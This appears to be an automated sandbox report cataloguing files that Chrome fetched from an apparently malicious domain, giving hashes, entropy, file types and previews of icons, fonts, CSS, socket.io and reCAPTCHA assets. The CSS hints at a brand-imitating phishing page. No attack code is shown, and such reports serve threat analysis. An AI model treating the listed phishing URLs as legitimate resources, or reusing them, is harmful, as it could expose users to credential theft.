                                                                                                                                      SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):36696
                                                                                                                                      Entropy (8bit):7.988666025644622
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:lvJo4KciQZYjebVq19lKPtHAQ/l4rj2bqkiHShpeSUOR4OqWOgaU:lhH3rVq1PKP432tSSh4SUORHqWcU
                                                                                                                                      MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                                                                                      SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                                                                                                      SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                                                                                      SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/23FMnyUutKWXvsdabgp1irvw70
                                                                                                                                      Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (23398), with no line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):23398
                                                                                                                                      Entropy (8bit):5.104409455331282
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:ztafGtz2omXX44PL5Ky0sdY8xbXnb4YEb0tkBSgfn:hafSz2omXX44PL5Ky0sdY8xbXnEYw0sz
                                                                                                                                      MD5:C1C51D30D5E7094136F2D828349E520F
                                                                                                                                      SHA1:10AE8971AD7A8798BC9732707FE4896B57541557
                                                                                                                                      SHA-256:0C55057782E3B346C2B819574BFA916852BC8AC5BB4E01D56E8FBFFC22043C98
                                                                                                                                      SHA-512:7CF90E58A309B53DB53570129780E0ABCEFA2802C1A6441C1A4B49DC265DF617220DC1072CEBDAE7A74C3CA85F5D87B606503BD48A60E049372BE5CAF39969F7
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/56AdOYKMMLgoJxyRlCwu18915
                                                                                                                                      Preview:*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}*,input{margin:0}.p,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{color:#fff;text-deco
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):270
                                                                                                                                      Entropy (8bit):4.840496990713235
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                                                                                                      MD5:40EB39126300B56BF66C20EE75B54093
                                                                                                                                      SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                                                                                      SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                                                                                      SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (45667)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):45806
                                                                                                                                      Entropy (8bit):5.207605835316031
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:1ZS0CCnasl8gRR/PoPez+iCMN0Fkiw2Jh4RWdRGhAjbp2ChPL8cYRGv5MRUK6np9:/CCnVl7tUkBxkdRGOfDiY5C5MAn5GY2
                                                                                                                                      MD5:80F5B8C6A9EEAC15DE93E5A112036A06
                                                                                                                                      SHA1:F7174635137D37581B11937FC90E9CB325077BCE
                                                                                                                                      SHA-256:0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
                                                                                                                                      SHA-512:B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://cdn.socket.io/4.6.0/socket.io.min.js
                                                                                                                                      Preview:/*!. * Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1864
                                                                                                                                      Entropy (8bit):5.222032823730197
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                                      MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                                      SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                                      SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                                      SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):727
                                                                                                                                      Entropy (8bit):7.573165690842521
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/70lGN4n6OF/Y9jJ6xmOLY3cyWiJBYmH7xCZm1Uvleq8AM8Tkbc0:HudJ6xU3fWU1HsZm1Wleq8t5b/
                                                                                                                                      MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                                                                                                      SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                                                                                                      SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                                                                                                      SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):268
                                                                                                                                      Entropy (8bit):5.111190711619041
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                                                                                                      MD5:59759B80E24A89C8CD029B14700E646D
                                                                                                                                      SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                                                                                      SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                                                                                      SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/rsU9Eqel6oXFg542R0Y7uK4Ff2sJKZkM88HuvPqoKUfUqAEELfv1t5GmNJ6cfSy4J0cd200
                                                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (1222), with no line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):1222
                                                                                                                                      Entropy (8bit):5.818804287152988
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:2jkm94/zKPccAv+KVCLTLv138EgFB5vtTGJTlWtRcw1MuhtsLqo40RWUnYN:VKEctKonR3evtTA87b1Muh6LrwUnG
                                                                                                                                      MD5:463D838587C8B5873CB6E4E942B770C9
                                                                                                                                      SHA1:E69DCF383A6F3F51F123CA2D86F19FC4BE09E612
                                                                                                                                      SHA-256:1448EC1B3F30A554233BD280AA99A7EAF690D1098647E7DDDEA286C757884F9C
                                                                                                                                      SHA-512:F02DE64A37B90492D714CC7D132C49BF29CB5117CA945258BAF5B36D087A3A2AED165C6FF37D2ED4E4F10D7199AFB9C2B5E2555BA1BECA1A8D3AE133F4DF4B23
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://www.google.com/recaptcha/api.js
                                                                                                                                      Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;var m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='Az520Inasey3TAyqLyojQa8MnmCALSEU29yQFW8dePZ7xQTvSt73pHazLFTK5f7SyLUJSo2uKLesEtEa9aUYcgMAAACPeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);po.src='https://www.gstatic.com/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-0lJkOVHDy3ItYlCbUoEzThjP3hLhLYfEFPAkVOCx
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 90 x 33, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):61
                                                                                                                                      Entropy (8bit):4.068159130770306
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:yionv//thPlklOd/lhBxl/k4E08up:6v/lhP6Ol7B7Tp
                                                                                                                                      MD5:8864FF0527868F80E145735B3CBFAD41
                                                                                                                                      SHA1:729190ADE23AB9C92CC50D1FBBA75C0EE26F5404
                                                                                                                                      SHA-256:8E80470BBD3E90966EBC80546A0DE4208037410975145177219646886E614A6B
                                                                                                                                      SHA-512:42D74D85BD4FE17A672B05904EA2E7AF807ED27E9407E3649CFF43047D6879389D44E919B1E10ACBBB0563AF230CC45B99A82C8929EB261E92515FBAFE5DAAFC
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/880b6b356a282766/1715191956873/EUH-Q4aQROypa1l
                                                                                                                                      Preview:.PNG........IHDR...Z...!....../+W....IDAT.....$.....IEND.B`.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):7390
                                                                                                                                      Entropy (8bit):4.02755241095864
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                                                                                                      MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                                                                                      SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                                                                                      SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                                                                                      SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/klD379FF2GM6zPm33HgL5klVO4I4SQpHwx80Z7Yl1r1coRtBxGS3beU878163
                                                                                                                                      Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):43596
                                                                                                                                      Entropy (8bit):7.9952701440723475
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:b0nfc/3Osy1fo0tBBFF/GGXfN2ZHKTBUwL+BR49qCow3Z3HuvJ5+xXtTgXHk6/:b0fU3OdhFF/xNOoZc49ow3Z3HO+xX1mf
                                                                                                                                      MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                                                                                      SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                                                                                      SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                                                                                      SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/89hjocAARSebIS27gFLCdefRWidDS8kUab76
                                                                                                                                      Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):70712
                                                                                                                                      Entropy (8bit):6.94130504124589
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:lBgPNoDCQcgEBtp8Y/fYous0+W/+hVNpTrP19NhgtJ+6qcHaDCzGoSRug:lBgC+Qoju/szW/SNDaJ+6qc6DESR5
                                                                                                                                      MD5:F70FF06D19498D80B130EC78176FD3FF
                                                                                                                                      SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                                                                                                      SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                                                                                                      SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/stJHdx5abCDRUWhdXjmVIv3zo2ry8Mmnl7DqPy6KQiYHAxqLL9JOrSrQVeGnjcq8gh252
                                                                                                                                      Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):727
                                                                                                                                      Entropy (8bit):7.573165690842521
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/70lGN4n6OF/Y9jJ6xmOLY3cyWiJBYmH7xCZm1Uvleq8AM8Tkbc0:HudJ6xU3fWU1HsZm1Wleq8t5b/
                                                                                                                                      MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                                                                                                      SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                                                                                                      SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                                                                                                      SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/qrYOIGH4BKN8SNOJLeflWipzJBhyIs3HEHEROTD45140
                                                                                                                                      Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):49602
                                                                                                                                      Entropy (8bit):7.881935507115631
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:eKE36up1D3cLJg7zmjprNBQqJCoklwCeFrpKZ00PIwoftXEsQsV1kZ8IHml446Xe:KqupJ9+aqyqCz+0ALcmDIHnjL2p
                                                                                                                                      MD5:DB783743CD246FF4D77F4A3694285989
                                                                                                                                      SHA1:B9466716904457641B7831868B47162D8D378D41
                                                                                                                                      SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                                                                                                      SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                                                                                                      Malicious:false
